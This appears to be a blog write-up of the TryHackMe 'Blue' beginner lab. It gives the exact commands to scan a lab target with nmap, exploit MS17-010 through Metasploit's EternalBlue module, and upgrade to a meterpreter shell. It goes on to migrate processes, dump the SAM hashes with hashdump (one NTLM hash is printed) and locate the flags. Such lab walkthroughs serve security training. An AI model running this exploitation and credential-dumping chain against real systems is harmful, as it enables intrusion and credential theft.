THM Series #1 Blue

It has been another long break but again back to writing which I like from the heart. In this post, I am going to take you through steps, which I performed to complete the task on Try Hack Me. The activity Blue has been described by THM as “this is an educational series for complete beginners. Professionals will likely get very little out of this room beyond basic practice as the process here is meant to be beginner-focused.

Step 1: Deploy Target Machine and Connect to VPN network for accessing Target Machine.

Deploying Target Machine on THM Platform

Step 2: Activity Questions

Q1: Scan the machine. (If you are unsure how to tackle this, I recommend checking out the room RP: Nmap)

I performed a nmap scan against the target machine. nmap -sV -Pn 10.10.236.183

Nmap Response Screenshot

Q2: How many ports are open with a port number under 1000?

From above the screenshot, there are 3 ports open i.e. 135, 139 & 445.

Q3: What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)

To identify if the detected service is running a vulnerable version, I used the nmap vulnerability script. nmap -script vuln -Pn 10.10.236.183. The script output indicated that service is vulnerable with smb-vuln-ms017-010.

Nmap Command to use Script to Identify Vulnerability
SMB Vulnerability

Q4: Start Metasploit

msfconsole launches Metasploit on the Kali Linux.

Launching Metasploit

Q5: Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)

search ms17-010 lists out the available module in the Metasploit. We are going to use exploit/windows/smb/ms17_010_eternalblue

Searching Through Metasploit for modules

Q6: Show options and set the one required value. What is the name of this value? (All caps for submission)

Module Options

use exploit/windows/smb/ms17_010_eternalblue set the module to be used. show options show all available options. As per the above screenshot, there are 4 required parameters but one of them has not been set i.e. RHOSTS. The target IP address needs to be assigned to RHOSTS. set RHOSTS 10.10.236.183. Also since we are on VPN, we need to update another parameter i.e. LHOST with IP address assigned on the VPN interface.

Setting Options

Q7. Run the exploit!

Exploiting Target

Q8. Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target. 

use post/multi/manage/shell_to_meterpreter will get us a meterpreter shell. We need to identify the session # by using command sessions as it lists the active sessions. The relevant session # should be set using parameter set SESSION session# **1 for this case**

Converting Shell to Meterpreter

Q9. Select this (use MODULE_PATH). Show options, what option are we required to change? (All caps for answer)

From the above screenshot, SESSION is the option which needs to be assigned with the relevant active session #.

Q10. Set the required option, you may need to list all of the sessions to find your target here. 

As shown in above screenshot, sessions list out all sessions and set SESSION session# set the option to relevant session #

Q11. Run! If this doesn’t work, try completing the exploit from the previous task once more.

run will execute the module and successful exploitation will provide us the meterpreter shell.

Q12. Once the meterpreter shell conversion completes, select that session for use.

session -i session# will open the initially exploited session where we hadn’t got the meterpreter shell.

Q13. Verify that we have escalated to NT AUTHORITY\SYSTEM. Run getsystem to confirm this. Feel free to open a dos shell via the command ‘shell’ and run ‘whoami’. This should return that we are indeed system. Background this shell afterwards and select our meterpreter session for usage again. 

Account Information

Q14. List all of the processes running via the ‘ps’ command. Just because we are system doesn’t mean our process is. Find a process towards the bottom of this list that is running at NT AUTHORITY\SYSTEM and write down the process id (far left column).

Process List

Q15. Migrate to this process using the ‘migrate PROCESS_ID’ command where the process id is the one you just wrote down in the previous step. This may take several attempts, migrating processes is not very stable. If this fails, you may need to re-run the conversion process or reboot the machine and start once again. If this happens, try a different process next time. 

After several attempts, I wasn’t able to migrate 3036[TrustedInstaller.exe], hence used 2688[SearchIndexer.exe] for migrating the process.

Migrating Process

Q16. Within our elevated meterpreter shell, run the command ‘hashdump’. This will dump all of the passwords on the machine as long as we have the correct privileges to do so. What is the name of the non-default user? 

help in meterpreter session list out all available options. hashdump is one of the available commands which is used to dump the content from SAM database. Security Account Manager[SAM] is a database file that stores user accounts’ information. Jon is the non-default user as per the dumped SAM data.

Hash Dump

Q17. Copy this password hash to a file and research how to crack it. What is the cracked password?

ffb43f0de35be4d9917ac0cc8ad57f8d is the dumped NTLM hash for user Jon. A Simple online tool can be used to crack the hash value. The cracked value of the hash was *******.

Cracking NTLM hash

Q18. Flag1? (Only submit the flag contents {CONTENTS})

Use shell to transfer the meterpreter shell to command prompt. Once we are in command prompt, we can use dir flag* /s /p to identify any file with pattern flag*. I searched after setting my present working directory as C:\. As per the below screenshot, 3 flag file is:

  • flag1.txt at C:\
  • flag2.txt at C:\Windows\System32\config
  • flag3.txt at C:\Users\Jon\Documents
Flags location
Flag 1

Q19. Flag2? *Errata: Windows really doesn’t like the location of this flag and can occasionally delete it. It may be necessary in some cases to terminate/restart the machine and rerun the exploit to find this flag. This relatively rare, however, it can happen. 

Flag 2

Q20. flag3?

Flag 3

The above questions complete the Blue box. To summarize the activities, we started with nmap to identify open ports. Later on, we used the nmap vulnerability script to verify if the open ports have any vulnerability. Once we got to know port 445 can be exploited with MS17-010, we turned towards Metasploit to find if there is any exploit module ready for the same. We identified the vulnerability and exploited the same. Post exploitation, we had to use another module to convert the obtained shell to meterpreter. After obtaining a meterpreter shell, the focus was on escalating privilege. Process migration was to gain elevated privileges and then we had to go through the flag finding approach.

I hope this simple tutorial would help to gain understanding and help is getting stuck at any point.

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s

This site uses Akismet to reduce spam. Learn how your comment data is processed.

Website Powered by WordPress.com.

Up ↑

%d bloggers like this: